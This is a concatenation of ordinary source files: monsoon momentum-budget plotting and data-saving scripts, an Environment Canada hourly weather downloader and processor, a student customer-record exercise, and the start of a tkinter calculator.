groups['SUM'] = ['ADV_AVG', 'ADV_CRS', 'EMFC', 'COR', 'PGF_ST', 'ANA']
print('Consolidating ubudget terms')
for key in groups:
nms = groups[key]
ubudget[key] = ubudget[nms[0]]
for nm in nms[1:]:
ubudget[key] = ubudget[key] + ubudget[nm]
# Tile the zonal mean values
varbig = ubudget['SUM']
for nm in ubudget.data_vars:
if lonname not in ubudget[nm].dims:
vals = atm.biggify(ubudget[nm], varbig, tile=True)
ubudget[nm] = xray.DataArray(vals, coords=varbig.coords)
# Sector mean budget
print('Computing sector mean ubudget')
ubudget_sector = atm.dim_mean(ubudget, 'lon', lon1, lon2)
# Streamfunction mean and eddy-driven decomposition
print('Computing streamfunction components')
eqbuf = 5.0
sector_scale = (lon2 - lon1) / 360.0
v = utils.v_components(ubudget_sector, scale=scale, eqbuf=eqbuf)
psi_comp = xray.Dataset()
for nm in v.data_vars:
psi_comp[nm] = atm.streamfunction(v[nm], sector_scale=sector_scale)
# Extract single pressure level for line plots
print('Extracting single pressure level for plots')
attrs = ubudget.attrs
attrs['plev'] = plev_plot
ubudget = atm.subset(ubudget, {pname: (plev_plot, plev_plot)}, squeeze=True)
ubudget_sector_plevs = ubudget_sector.copy()
ubudget_sector = atm.subset(ubudget_sector, {pname: (plev_plot, plev_plot)},
squeeze=True)
ubudget.attrs = attrs
ubudget_sector.attrs = attrs
print('Finished loading/calculating data')
# ----------------------------------------------------------------------
# Utility functions and plot formatting options
def saveclose(filestr):
atm.savefigs(filestr, ext='pdf', merge=True)
plt.close('all')
def get_daystr(plotdays):
if len(atm.makelist(plotdays)) > 1:
daystr = 'Rel Days %d to %d' % (plotdays[0], plotdays[-1])
savestr = 'reldays%d_%d' % (plotdays[0], plotdays[-1])
else:
daystr = 'Rel Day %d' % plotdays
savestr = 'relday%d' % plotdays
return daystr, savestr
# ----------------------------------------------------------------------
# Streamfunction latitude-day contours
psimid = atm.subset(data_latp['PSI'], {pname : (pmid, pmid)}, squeeze=True)
lat = atm.get_coord(data_latp, 'lat')
days = atm.get_coord(data_latp, 'dayrel')
clev = np.arange(-70, 71, 5)
ticks = np.arange(-70, 71, 10)
title='PSI%d' % pmid
plt.figure(figsize=(10, 7))
plt.contourf(days, lat, psimid.T, clev, cmap='RdBu_r', extend='both')
cb = plt.colorbar(ticks=ticks)
plt.ylim(-60, 60)
plt.xticks(np.arange(-120, 201, 30))
plt.grid()
plt.title(title)
plt.xlabel('Day Rel')
plt.ylabel('Latitude')
# ----------------------------------------------------------------------
# Streamfunction decomposition
def psi_latpres(psi, ps, cint=10, xlims=(-60, 60), xticks=range(-60, 61, 15),
title=''):
xmin, xmax = xlims
axlims = (xmin, xmax, 0, 1000)
atm.contour_latpres(psi, clev=cint, topo=ps, omitzero=True, axlims=axlims)
plt.xticks(xticks, xticks)
plt.grid()
plt.title(title, fontsize=10)
# plotdays = [-30, -15, 0, 15, 30]
# keys = ['TOT', 'MMC', 'EDDY', 'PGF', 'RESID']
plotdays = [-30, 0, 30]
keys = ['TOT', 'MMC', 'EDDY']
xlims, xticks = (-35, 35), range(-30, 31, 10)
cint = 5
nrow, ncol = len(keys), len(plotdays)
advance_by = 'col'
fig_kw = {'figsize' : (11, 7), 'sharex' : True, 'sharey' : True}
gridspec_kw = {'left' : 0.08, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
'bottom' : 0.08, 'top' : 0.9}
# fig_kw = {'figsize' : (14, 8), 'sharex' : True, 'sharey' : True}
# gridspec_kw = {'left' : 0.06, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
# 'bottom' : 0.06, 'top' : 0.92}
suptitle = '%d-%dE $\psi$ components' % (lon1, lon2)
grp = atm.FigGroup(nrow, ncol, advance_by, fig_kw=fig_kw,
gridspec_kw=gridspec_kw, suptitle=suptitle)
for key in keys:
for day in plotdays:
grp.next()
if grp.row == 0:
title = 'Day %d' % day
else:
title = ''
if key == 'TOT':
psi = data_latp['PSI'].sel(dayrel=day)
else:
psi = psi_comp[key].sel(dayrel=day)
psi_latpres(psi, ps, cint, xlims, xticks, title=title)
if grp.col > 0:
plt.ylabel('')
if grp.row < grp.nrow - 1:
plt.xlabel('')
atm.text(key, (0.05, 0.88))
# ----------------------------------------------------------------------
# Lat-pres contours of ubudget components
day = 0
nm = 'COR_AVG'
var = ubudget_sector_plevs[nm].sel(dayrel=day)
plt.figure()
atm.pcolor_latpres(var)
plt.xlim(-60,60)
# ----------------------------------------------------------------------
# Lat-pres contours and line plots on individual days
def latpres(data_latp, day, ps, xlims=(-60, 60), xticks=range(-60, 61, 15),
title=None, clev_u=5, clev_psi=5, u_clr='m', u_kw={'alpha' : 0.35},
psi_kw={'alpha' : 0.7}):
"""Plot lat-pres contours of streamfunction and zonal wind.
"""
xmin, xmax = xlims
axlims = (xmin, xmax, 0, 1000)
latp_data = atm.subset(data_latp, {'dayrel' : (day, day)}, squeeze=True)
u = latp_data['U']
psi = latp_data['PSI']
atm.contour_latpres(u, clev=clev_u, topo=ps, colors=u_clr,
contour_kw=u_kw, axlims=axlims)
atm.contour_latpres(psi, clev=clev_psi, omitzero=True, axlims=axlims,
contour_kw=psi_kw)
plt.xticks(xticks, xticks)
plt.grid()
if title is not None:
plt.title(title)
def lineplot(ubudget_sector, keys, day, style, xlims=(-60, 60),
xticks=range(-60, 61, 15), title=None, ylabel=None, legend=True,
legend_kw={'fontsize' : 8, 'loc' : 'lower center', 'ncol' : 2,
'handlelength' : 2.5}):
"""Plot ubudget terms and winds vs latitude."""
subset_dict = {'dayrel' : (day, day), 'lat': xlims}
data = atm.subset(ubudget_sector[keys], subset_dict, squeeze=True)
data = data.to_dataframe()
data.plot(ax=plt.gca(), style=style, legend=False)
plt.xlim(xlims)
plt.xticks(xticks, xticks)
plt.xlabel('Latitude')
plt.grid()
if legend:
plt.legend(**legend_kw)
if ylabel is not None:
plt.ylabel(ylabel)
if title is not None:
plt.title(title)
# Summary plot of psi and u lat-pres contours for presentation
nrow, ncol = 2, 2
advance_by = 'row'
fig_kw = {'figsize' : (11, 7), 'sharex' : 'col', 'sharey' : 'row'}
gridspec_kw = {'left' : 0.1, 'right' : 0.96, 'wspace' : 0.06, 'hspace' : 0.2,
'bottom' : 0.08, 'top' : 0.95}
plotdays = [-15, 0, 15, 30]
xlims, xticks = (-35, 35), range(-30, 31, 10)
grp = atm.FigGroup(nrow, ncol,fig_kw=fig_kw, gridspec_kw=gridspec_kw)
for day in plotdays:
grp.next()
title = 'Day %d' % day
latpres(data_latp, day, ps, xlims=xlims, xticks=xticks)
plt.title(title, fontsize=11)
if grp.row < grp.nrow - 1:
plt.xlabel('')
if grp.col > 0:
plt.ylabel('')
# Lat-pres contours and line plots of 200 mb momentum budget
style = {'ADV_AVG' : 'b', 'COR_AVG' : 'b--', 'ADV+COR' : 'r',
'PGF_ST' : 'k', 'ADV_CRS' : 'g', 'ADV_AVST' : 'g--',
'ADV_STAV' : 'g-.', 'EMFC' : 'm', 'EMFC_TR' : 'm--', 'EMFC_ST' : 'm-.',
'SUM' : 'k--', 'ACCEL' : 'c', 'ANA' : 'y', 'U' : 'k', 'V' : 'k--'}
keys_dict = collections.OrderedDict()
#keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
'ADV_CRS', 'EMFC']
keys_dict['winds'] = ['U', 'V']
keys_dict['eddies'] = ['EMFC_TR', 'EMFC_ST', 'EMFC', 'ADV_CRS']
ylabels = {}
units = '$10^{-4}$ m s$^{-2}$'
#ylabels['ubudget'] = '%d hPa ubudget (%s)' % (plev_plot, units)
ylabels['ubudget'] = units
ylabels['eddies'] = ylabels['ubudget']
#ylabels['winds'] = '%d hPa winds (m/s)' % plev_plot
ylabels['winds'] = 'm/s'
#plotdays = [-30, -15, 0, 15, 30] + [-90, -45, 0, 45, 90]
#nrow, ncol = 4, 5
plotdays = [-30, 0, 30]
nrow, ncol = 4, 3
advance_by = 'row'
# fig_kw = {'figsize' : (18, 12), 'sharex' : 'col', 'sharey' : 'row'}
# gridspec_kw = {'left' : 0.05, 'right' : 0.99, 'wspace' : 0.06, 'hspace' : 0.08,
# 'bottom' : 0.04, 'top' : 0.92, 'height_ratios' : [1, 0.6, 1, 1]}
fig_kw = {'figsize' : (11, 9), 'sharex' : 'col', 'sharey' : 'row'}
gridspec_kw = {'left' : 0.08, 'right' : 0.99, 'wspace' : 0.09, 'hspace' : 0.1,
'bottom' : 0.05, 'top' : 0.92, 'height_ratios' : [1, 0.6, 1, 1]}
legend_kw={'fontsize' : 8, 'loc' : 'upper center', 'ncol' : 2,
'handlelength' : 2.5}
suptitle = '%d-%d E U and $\psi$ contours, ubudget at 200 hPa' % (lon1, lon2)
#for tropics in [False, True]:
for tropics in [False]:
if tropics:
xlims, xticks = (-35, 35), range(-30, 31, 10)
else:
xlims, xticks = (-60, 60), range(-60, 61, 15)
grp = atm.FigGroup(nrow, ncol, advance_by, fig_kw=fig_kw,
gridspec_kw=gridspec_kw, suptitle=suptitle)
for day in plotdays:
grp.next()
if grp.row == 0:
title = 'Day %d' % day
else:
title = None
latpres(data_latp, day, ps, title=title, xlims=xlims, xticks=xticks)
for nm in ['winds', 'ubudget', 'eddies']:
grp.next()
if grp.col == 0:
legend = True
# if nm == 'ubudget' :
# legend_kw['loc'] = 'lower center'
# else:
# legend_kw['loc'] = 'upper center'
else:
legend = False
keys = keys_dict[nm]
lineplot(ubudget_sector, keys, day, style, xlims=xlims,
xticks=xticks, legend=legend, legend_kw=legend_kw,
ylabel=ylabels[nm])
saveclose(savedir + 'ubudget_sector_latpres_lineplots')
# ----------------------------------------------------------------------
# Plot groups together
keys_list = [['ADV_AVG', 'ADV_CRS', 'COR_AVG', 'COR_ST', 'EMFC', 'PGF_ST',
'SUM', 'ACCEL'],
['U', 'V'],
['ADV_AVG', 'ADV_AVST', 'ADV_STAV', 'ADV_CRS'],
['COR_AVG', 'COR_ST', 'COR'],
['EMFC_TR', 'EMFC_ST', 'EMFC']]
def pcolor_sector(var, daynm, clims, u=None, v=None):
days = var[daynm].values
lat = atm.get_coord(var, 'lat')
x, y = np.meshgrid(days, lat)
vals = var.values.T
vals = np.ma.masked_array(vals, mask=np.isnan(vals))
plt.pcolormesh(x, y, vals, cmap='RdBu_r')
plt.clim(clims)
plt.colorbar(extend='both')
if u is not None:
plt.contour(x, y, u.values.T, [0], colors='k', linewidths=1.5)
if v is not None:
plt.contour(x, y, v.values.T, [0], colors='k', alpha=0.5)
plt.xlim(days.min(), days.max())
plt.xlabel('Rel Day')
plt.ylabel('Latitude')
def plot_groups(ubudget, keys_list, daynm, plotdays=None, latlims=None):
"""Plot groups of lat-lon or lat-day plots.
"""
if latlims is not None:
ubudget = atm.subset(ubudget, {'lat' : latlims})
units = ubudget.attrs['comp_units']
plev = ubudget.attrs['plev']
lon1, lon2 = ubudget.attrs['lon1'], ubudget.attrs['lon2']
try:
lon = atm.get_coord(ubudget, 'lon')
sector = False
except ValueError:
sector = True
if sector:
suptitle = '%d-%d E Zonal Momentum Budget at %d hPa (%s)'
suptitle = suptitle % (lon1, lon2, plev, units)
xticks = range(-120, 201, 60)
else:
daystr, savestr = get_daystr(plotdays)
suptitle = '%s Zonal Momentum Budget at %d hPa (%s)'
suptitle = suptitle % (daystr, plev, units)
xticks = range(40, 121, 20)
nrow, ncol = 3, 4
figsize = (14, 10)
opts = {'left' : 0.05, 'right' : 0.95, 'bottom' : 0.04, 'top' : 0.92,
'wspace' : 0.1, 'hspace' : 0.1}
for i, keys in enumerate(keys_list):
if sector:
data = ubudget[keys]
else:
data = atm.subset(ubudget[keys], {daynm : (plotdays, None)})
if len(atm.makelist(plotdays)) > 1:
data = data.mean(dim=daynm)
clims = atm.climits(data, symmetric=True)
if sector:
clims = 0.9 * np.array(clims)
if i == 0 or i == 2:
isub = 0
plt.figure(figsize=figsize)
plt.suptitle(suptitle)
plt.subplots_adjust(**opts)
for j, nm in enumerate(keys):
isub += 1
if 'U' in keys:
clims = atm.climits(data[nm], symmetric=True)
plt.subplot(nrow, ncol, isub)
if sector:
pcolor_sector(data[nm], daynm, clims, ubudget['U'], ubudget['V'])
else:
atm.pcolor_latlon(data[nm], fancy=False)
plt.clim(clims)
plt.title(nm, fontsize=9)
atm.fmt_subplot(nrow, ncol, isub, xticks=xticks)
plt.grid(True)
# Skip to next row if necessary
if ncol > len(keys):
isub += ncol - len(keys)
for tropics in [True, False]:
savestr = savedir + 'ubudget_'
if tropics:
savestr = savestr + 'tropics_'
latlims = [-30, 30]
else:
latlims = None
# Lat-lon maps
for plotdays in [-90, -30, 0, 30, 60]:
plot_groups(ubudget, keys_list, daynm, plotdays, latlims)
saveclose(savestr + 'latlon')
# Sector lat-day maps
plot_groups(ubudget_sector, keys_list, daynm, None, latlims)
saveclose(savestr + 'sector_latday')
# ----------------------------------------------------------------------
# def zerocrossings(var, latmin, latmax, smoothing=30, interp_res=0.1, nkeep=3):
# var = atm.subset(var, {'lat' : (latmin, latmax)})
# if smoothing is not None:
# var = atm.rolling_mean(var, smoothing, axis=0, center=True)
# lat = atm.get_coord(var, 'lat')
# lat_i = np.arange(latmin, latmax + interp_res, interp_res)
# daynm = var.dims[0]
# days = var[daynm]
# crossings = np.nan * np.ones((nkeep, len(days)), dtype=float)
#
# for d, day in enumerate(days):
# vals = var.sel(**{daynm : day})
# if not np.isnan(vals).all():
# vals = np.interp(lat_i, lat, vals)
# icross = np.where(np.diff(np.sign(vals)))[0]
# latcross = lat_i[icross]
# n = min(nkeep, len(latcross))
# crossings[:n, d] = latcross[:n]
#
# coords = {'n' : np.arange(nkeep) + 1, daynm : var[daynm]}
# crossings = xray.DataArray(crossings, name='zerolat', dims=['n', daynm],
# coords=coords)
#
# return crossings
#
# def psimax_lat(psi, latmin=-30, latmax=10, pmin=300, pmax=700, nsmooth=5):
# days_in = psi['dayrel']
# psi = atm.subset(psi, {'lat' : (latmin, latmax), 'plev' : (pmin, pmax)},
# squeeze=True)
# psi = psi[nsmooth:-nsmooth]
# pdim = atm.get_coord(psi, 'plev', 'dim')
# psi = psi.max(axis=pdim)
#
# lat = atm.get_coord(psi, 'lat')
# latdim = atm.get_coord(psi, 'lat', 'dim')
# ilatmax = psi.argmax(axis=latdim)
# latmax = lat[ilatmax]
# days = atm.get_coord(psi, 'dayrel')
# latmax = xray.DataArray(latmax, coords={'dayrel' : days})
# latmax = latmax.reindex_like(days_in)
# return latmax
# ----------------------------------------------------------------------
# # Line plots on individual days
#
# latmin, latmax = -40, 50
# smoothing = None
# nkeep = {'U' : 2, 'V' : 3}
# zerolats = xray.Dataset()
# for nm in nkeep:
# n = nkeep[nm]
# crossings = zerocrossings(ubudget_sector[nm], latmin, latmax, nkeep=n,
# smoothing=smoothing)
# for i in crossings['n'].values:
# key = nm + '%d' % i
# zerolats[key] = crossings.sel(n=i).drop('n')
#
# check_zerolats = False
# if check_zerolats:
# plt.figure()
# for nm in zerolats.data_vars:
# plt.plot(zerolats[daynm], zerolats[nm], label=nm)
# plt.legend()
#
#
# style = {'ADV_AVG' : 'b', 'COR_AVG' : 'b--', 'ADV+COR' : 'r',
# 'PGF_ST' : 'k', 'ADV_CRS' : 'g', 'ADV_AVST' : 'g--',
# 'ADV_STAV' : 'g-.', 'EMFC' : 'm', 'EMFC_TR' : 'm--', 'EMFC_ST' : 'm-.',
# 'SUM' : 'k--', 'ACCEL' : 'c', 'ANA' : 'y', 'U' : 'k', 'V' : 'k--'}
#
# keys_dict = collections.OrderedDict()
# keys_dict['ubudget'] = ['ADV_AVG', 'COR_AVG', 'ADV+COR', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
# keys_dict['winds'] = ['U', 'V']
# keys_dict['eddies'] = ['EMFC_TR', 'EMFC_ST', 'EMFC', 'ADV_AVST', 'ADV_STAV',
# 'ADV_CRS']
# suptitle = '%d-%d E %s at %d hPa'
# suptitles = {}
# suptitles['ubudget'] = suptitle % (lon1, lon2, 'Zonal Momentum Budget', plev)
# suptitles['eddies'] = suptitles['ubudget']
# suptitles['winds'] = suptitle % (lon1, lon2, 'Winds', plev)
# ylabels = {}
# ylabels['ubudget'] = 'ubudget (%s)' % ubudget.attrs['comp_units']
# ylabels['eddies'] = ylabels['ubudget']
# ylabels['winds'] = 'winds (m/s)'
#
# plotdays = [-90, -30, -15, 0, 15, 30, 60, 90]
# nrow, ncol = 2, 4
# figsize = (14, 10)
# lat = atm.get_coord(ubudget, 'lat')
# latname = atm.get_coord(ubudget, 'lat', 'name')
# opts = {'left' : 0.05, 'right' : 0.95, 'bottom' : 0.06, 'top' : 0.94,
# 'wspace' : 0.1, 'hspace' : 0.1}
# lg_row, lg_col, lg_loc, lg_ncol = 2, 1, 'upper center', 2
# zlat_opts = {'U1' : {'label' : 'U=0'}, 'U2' : {},
# 'V1' : {'linestyle' : 'dashed', 'label' : 'V=0'},
# 'V2' : {'linestyle' : 'dashed'}, 'V3' : {'linestyle' : 'dashed'}}
#
# for nm in keys_dict:
# keys = keys_dict[nm]
# suptitle, ylabel = suptitles[nm], ylabels[nm]
# for latlims in [(-60, 60), (-35, 35)]:
# fig, axes = plt.subplots(nrow, ncol, figsize=figsize, sharex=True,
# sharey=True)
# plt.subplots_adjust(**opts)
# plt.autoscale(tight=True)
# plt.suptitle(suptitle)
# for i, day in enumerate(plotdays):
# row, col = atm.subplot_index(nrow, ncol, i + 1)
# ax = axes[row - 1, col - 1]
# subset_dict = {daynm : (day, day), latname: latlims}
# data = atm.subset(ubudget_sector[keys], subset_dict, squeeze=True)
# #data = data.drop(daynm).to_dataframe()
# data = data.to_dataframe()
# data.plot(ax=ax, style=style, legend=False)
# # Plot vertical lines for U=0 and V=0
# zlats = zerolats.sel(**{daynm : day})
# for nm in zlats.data_vars:
# ax.axvline(zlats[nm], color='k', alpha=0.5, linewidth=1.5,
# **zlat_opts[nm])
# ax.set_title('Day %d' % day, fontsize=10)
# ax.grid(True)
# if row == lg_row and col == lg_col:
# ax.legend(fontsize=9, loc=lg_loc, ncol=lg_ncol, handlelength=3)
# if row == nrow:
# ax.set_xlabel('Lat')
# if col == 1:
# ax.set_ylabel(ylabel)
#
# saveclose(savedir + 'ubudget_sector_lineplots')
# ----------------------------------------------------------------------
# latmax = psimax_lat(data_latp['PSI'], nsmooth=ndays, pmin=600, pmax=700)
#
# # Ubudget terms at latitude of psimax
# print('Computing ubudget terms at latitude of psimax for each day')
# days = latmax['dayrel']
# days = days[np.isfinite(latmax)]
# ubudget_psimax = xray.Dataset()
# for d, day in enumerate(days):
# lat0 = latmax.sel(dayrel=day).values
# ds = atm.subset(ubudget_sector, {'lat' : (lat0, lat0)}, squeeze=True)
# ds = atm.subset(ds, {'dayrel' : (day, day)}, squeeze=False)
# if d == 0:
# ubudget_psimax = ds
# else:
# ubudget_psimax = xray.concat([ubudget_psimax, ds], dim='dayrel')
#
# keys = ['ADV_AVG', 'COR_AVG', 'ADV+COR_AVG', 'PGF_ST',
# 'ADV_CRS', 'EMFC', 'ANA', 'SUM', 'ACCEL']
#
# xticks = range(-120, 201, 30)
# xlims = [-120, 200]
# plt.figure(figsize=(8, 12))
# plt.subplot(2, 1, 1)
# plt.plot(latmax['dayrel'], latmax)
# plt.xticks(xticks)
# plt.xlim(xlims)
# plt.grid(True)
# plt.subplot(2, 1, 2)
# ubudget_psimax[keys].to_dataframe().plot(ax=plt.gca(), style=style, legend=False)
# plt.legend(fontsize=8, ncol=3)
# plt.xticks(xticks)
# plt.xlim(xlims)
# plt.grid(True)
```
#### File: monsoon-onset/scripts/save-dailyrel-momentum-budget.py
```python
import sys
sys.path.append('/home/jwalker/dynamics/python/atmos-tools')
sys.path.append('/home/jwalker/dynamics/python/atmos-read')
sys.path.append('/home/jwalker/dynamics/python/monsoon-onset')
import os
import numpy as np
import xarray as xray
import pandas as pd
import matplotlib.pyplot as plt
import collections
import atmos as atm
import merra
import indices
import utils
# ----------------------------------------------------------------------
version = 'merra2'
years = np.arange(1980, 2016)
onset_nm = 'CHP_MFC'
plevs = [1000,925,850,775,700,600,500,400,300,250,200,150,100,70,50,30,20]
ind_nm, npre, npost = 'onset', 140, 230
#ind_nm, npre, npost = 'retreat', 270, 100
datadir = atm.homedir() + 'datastore/%s/analysis/' % version
savedir = atm.homedir() + 'datastore/%s/analysis/' % version
filestr = datadir + version + '_ubudget%d_ndays5_60E-100E_%d.nc'
savestr = savedir + version + '_ubudget%d_dailyrel_'
if ind_nm == 'retreat':
savestr = savestr + 'retreat_'
savestr = savestr + onset_nm +'_ndays5_60E-100E'
datafiles, savefiles = {}, {}
for plev in plevs:
datafiles[plev] = [filestr % (plev, yr) for yr in years]
savefiles[plev] = [savestr % plev + '_%d.nc' % yr for yr in years]
yearstr = '%d-%d' % (min(years), max(years))
indfile = savedir + version + '_index_%s_%s.nc' % (onset_nm, yearstr)
# ----------------------------------------------------------------------
# Onset index for each year
print('Opening ' + indfile)
with xray.open_dataset(indfile) as index:
index.load()
onset = index['onset'].values
retreat = index['retreat'].values
# ----------------------------------------------------------------------
# Get daily data
def get_data(datafile, year, d0, npre, npost):
daymin, daymax = d0 - npre, d0 + npost
ndays = len(atm.season_days('ANN', year))
file_pre = datafile.replace(str(year), str(year - 1))
file_post = datafile.replace(str(year), str(year + 1))
if daymin <1 and os.path.isfile(file_pre):
print('---Loading prev year ' + file_pre)
with xray.open_dataset(file_pre) as ds_pre:
ds_pre.load()
else:
ds_pre = None
if daymax > ndays and os.path.isfile(file_post):
print('---Loading next year ' + file_post)
with xray.open_dataset(file_post) as ds_post:
ds_post.load()
else:
ds_post = None
print('Loading ' + datafile)
with xray.open_dataset(datafile) as ds:
data = utils.wrapyear(ds, ds_pre, ds_post, daymin, daymax, year=year)
data.attrs = ds.attrs
return data
for plev in plevs:
for y, year in enumerate(years):
datafile = datafiles[plev][y]
d_onset, d_retreat = onset[y], retreat[y]
d0 = int(index[ind_nm][y].values)
ds_rel = xray.Dataset()
ds = get_data(datafile, year, d0, npre, npost)
ds_rel.attrs = ds.attrs
for nm in ds.data_vars:
var = atm.expand_dims(ds[nm], 'year', year)
ds_rel[nm] = utils.daily_rel2onset(var, d0, npre, npost)
ds_rel.attrs['d_onset'] = d_onset
ds_rel.attrs['d_retreat'] = d_retreat
savefile = savefiles[plev][y]
print('Saving to ' + savefile)
ds_rel.to_netcdf(savefile)
# ----------------------------------------------------------------------
# Compute climatologies and save
yearstr = '%d-%d' % (years.min(), years.max())
for plev in plevs:
relfiles = savefiles[plev]
savefile = savestr % plev + '_' + yearstr + '.nc'
ds = atm.mean_over_files(relfiles)
ds.attrs['years'] = years
print('Saving to ' + savefile)
ds.to_netcdf(savefile)
# ----------------------------------------------------------------------
# Concatenate plevels in climatology and save
files = [savestr % plev + '_' + yearstr + '.nc' for plev in plevs]
ubudget = xray.Dataset()
pname, pdim = 'Height', 1
subset_dict = {'lat' : (-60, 60), 'lon' : (40, 120)}
for i, plev in enumerate(plevs):
filenm = files[i]
print('Loading ' + filenm)
with xray.open_dataset(filenm) as ds:
ds = atm.subset(ds, subset_dict)
ds.load()
for nm in ds.data_vars:
ds[nm] = atm.expand_dims(ds[nm], pname, plev, axis=pdim)
if i == 0:
ubudget = ds
else:
ubudget = xray.concat([ubudget, ds], dim=pname)
ubudget.coords[pname].attrs['units'] = 'hPa'
savefile = files[0]
savefile = savefile.replace('%d' % plevs[0], '')
print('Saving to ' + savefile)
ubudget.to_netcdf(savefile)
```
|
{
"source": "jenfly/pyladies-pandas",
"score": 4
}
|
#### File: wrangling/environment-canada/ecweather.py
```python
import numpy as np
import pandas as pd
import requests
def download_hourly_raw(env_canada_id, year, month, savefile='test.csv', verbose=True):
"""Download csv file of hourly data for selected station, year, and month"""
# URL endpoint and query parameters
url_endpoint = 'http://climate.weather.gc.ca/climate_data/bulk_data_e.html'
params = {'format' : 'csv',
'stationID' : env_canada_id,
'Year' : year,
'Month' : f'{month:02d}',
'Day' : '01',
'timeframe' : '1',
'submit' : ' Download Data'}
# Send GET request
response = requests.get(url_endpoint, params=params)
# Download csv file
if verbose:
print(f'Saving to {savefile}')
with open(savefile, 'wb') as f:
f.write(response.content)
return None
def read_hourly_raw(csv_file, pre_process=True, skiprows=15):
"""Read hourly weather data from CSV file, and return as a DataFrame.
If argument `pre_process` is True, some minor pre-processing is applied
to the DataFrame: adjust some column labels, and include only the columns
we're interested in.
"""
df = pd.read_csv(csv_file, skiprows=skiprows, index_col=0, parse_dates=True)
if pre_process:
# Remove redundant time columns and any columns with label ending in "Flag"
time_cols = ['Year', 'Month', 'Day' , 'Time']
flag_cols = [col for col in df.columns if col.endswith('Flag')]
df = df.drop(time_cols + flag_cols, axis=1)
# Remove non-ascii degree symbol from column labels
# and rename 'Weather' to 'Conditions'
def adjust_label(label):
return label.replace('\xb0', 'deg ').replace('Weather', 'Conditions')
columns = [adjust_label(col) for col in df.columns]
df.columns = columns
# Rename datetime index
df.index.name = 'Datetime (Local Standard)'
return df
def load_hourly_data(csv_files, pre_process=True, skiprows=15, verbose=True):
"""Read raw hourly data from list of csv files, merge, and return as a DataFrame
If argument `pre_process` is True, some minor pre-processing is applied
to the DataFrame: adjust some column labels, and include only the columns
we're interested in.
"""
df_list = []
for csv_file in csv_files:
if verbose:
print(f'Reading {csv_file}')
df_in = read_hourly_raw(csv_file, pre_process=pre_process, skiprows=skiprows)
df_list.append(df_in)
data = pd.concat(df_list, axis=0)
return data
def process_hourly_data(data, station, stations_info, verbose=True):
"""Process hourly weather data and station metadata, and return as a DataFrame"""
# Check for any rows where all measurements are missing
all_missing = data.isnull().all(axis=1)
if verbose:
print(f'{all_missing.value_counts().get(True)} rows with all measurements missing')
# Assume weather category persists until indicated otherwise by a new non-null value
# so use forward filling, except if all other measurements are missing, then leave as null
data_out = data.copy()
data_out['Conditions'] = data_out['Conditions'].fillna(method='ffill')
data_out.loc[all_missing, 'Conditions'] = np.nan
# Convert wind direction from 10s of degrees to degrees
data_out['Wind Dir (deg)'] = 10 * data_out['Wind Dir (10s deg)']
# Add station metadata
data_out['Station ID'] = station
data_out['Station Name'] = stations_info.loc[station, 'Name']
data_out['Timezone'] = stations_info.loc[station, 'Timezone']
# Calculate UTC datetimes
utc_offset_hours = stations_info.loc[station, 'UTC Offset (hours)']
tdelta = pd.Timedelta(-utc_offset_hours, unit='h')
data_out['Datetime (UTC)'] = data_out.index + tdelta
# Reorder columns
columns = ['Station ID', 'Station Name', 'Timezone', 'Datetime (UTC)',
'Temp (deg C)', 'Dew Point Temp (deg C)', 'Rel Hum (%)',
'Wind Dir (deg)', 'Wind Spd (km/h)', 'Visibility (km)',
'Stn Press (kPa)', 'Hmdx', 'Wind Chill', 'Conditions']
data_out = data_out[columns]
return data_out
```
|
{
"source": "JenFuChen/NKUST",
"score": 4
}
|
#### File: Python/110-1/1222.py
```python
def addCustomer():
check = 0
ID = data[1]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
print("Exist")
check = 1
if(check == 0):
customerData.append(data[1:5])
def deleteCustomer():
check = 0
ID = data[1]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
del customerData[i]
check = 1
if(check == 0):
print("None")
def arrangeData():
check = 0
ID = data[1]
option = int(data[2])
index = data[3]
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
if(option == 0): # ID
customerData[i][1] = index
if(option == 1): # phone.
customerData[i][2] = index
if(option == 2): # birth
customerData[i][3] = index
check = 1
if(check == 0):
print("None")
def searchCustomer():
check = 0
ID = data[1]
option = int(data[2])
for i in range(len(customerData)-1, -1, -1):
if(ID == customerData[i][0]):
if(option == 0): # ID
print(customerData[i][1])
if(option == 1): # phone.
print(customerData[i][2])
if(option == 2): # birth
print(customerData[i][3])
check = 1
if(check == 0):
print("None")
customerData = []
while(1):
data = input()
data = data.split()
order = data[0]
if(order == '*'):
break
if (order == '@'):
addCustomer()
if(order == "#"):
deleteCustomer()
if(order == "!"):
arrangeData()
if(order == '$'):
searchCustomer()
# 2 Roger 0912345678 550101 測資
```
#### File: Python/110-2/0309.py
```python
from tkinter import *
import tkinter
from tkmacosx import Button
root = Tk()
root.title("Caculator")
Button_1 = Button()
contentVar = tkinter.StringVar(root, '')
buttonList = [
['C', '//', '*', '-'],
['7', '8', '9', '+'],
['4', '5', '6'],
['1', '2', '3', '='],
['0', '.']]
def caculateFunc(inputStr):
operation = ('+', '-', '*', '//')
content = contentVar.get()
print("get = ", inputStr, "\n")
if(inputStr in '0123456789.'):
content += inputStr
elif(inputStr in operation):
content += inputStr
elif(inputStr == 'C'):
content = ''
elif(inputStr == '='):
content = str(eval(content))
contentVar.set(content)
# 顯示運算式按鈕框
displayButton = Button(root, fg='white', bg='#3E4149', textvariable=contentVar,
width=200, height=50)
displayButton.grid(row=0, column=0, columnspan=4)
displayButton["font"] = ("arial", 20, "bold")
for i in range(5):
for j in range(len(buttonList[i])):
col = j
get_str = buttonList[i][j]
if((i == 1 and j == 3) or (i == 3 and j == 3)): # + =
rowpan = 2
colpan = 1
height = 100
width = 50
elif((i == 4 and j == 0)): # 0
colpan = 2
rowpan = 1
width = 100
height = 50
elif((i == 4 and j == 1)): # ..
col = j+1
colpan = 1
rowpan = 1
width = 50
height = 50
else:
colpan = 1
rowpan = 1
width = 50
height = 50
Button_1 = Button(root, text=buttonList[i][j], bg='#F4AA40', fg='black',
width=width, height=height,
command=lambda x=get_str: caculateFunc(x))
